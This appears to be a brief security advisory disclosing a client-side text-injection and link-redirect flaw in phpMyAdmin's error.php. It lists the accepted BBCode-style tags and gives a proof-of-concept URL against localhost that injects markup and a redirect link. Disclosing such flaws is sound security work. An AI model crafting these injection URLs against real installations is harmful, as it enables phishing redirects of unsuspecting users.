PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification Credits: Emanuele 'emgent' Gentili Marco 'white_sheep' Rondini Alessandro 'scox' Scoscia In error.php, PhpMyAdmin permit to insert text and restricted tag, like BBCode. With tag [a@url@page]Click Me[/a], you can insert your own page, and redirect all users. Available tags are: '[i]' => '', '[/i]' => '', '[em]' => '', '[/em]' => '', '[b]' => '', '[/b]' => '', '[strong]' => '', '[/strong]' => '', '[tt]' => '', '[/tt]' => '', '[code]' => '', '[/code]' => '', '[kbd]' => '', '[/kbd]' => '', '[br]' => '
', '[/a]' => '', '[sup]' => '', '[/sup]' => '', and replace '/\[a@([^"@]*)@([^]"]*)\]/' with '' POC: http://127.0.0.1/phpmyadmin/error.php?type=This+is+a+client+side+hole+evidence&error=Client+side+attack+via+characters+injection[br]It%27s+possible+use+some+special+tags+too[br]Found+by+Tiger+Security+Tiger+Team+-+[a%40http://www.tigersecurity.it%40_self]This%20Is%20a%20Link[%2Fa] OWASP Reference: http://www.owasp.org/index.php/Unvalidated_Input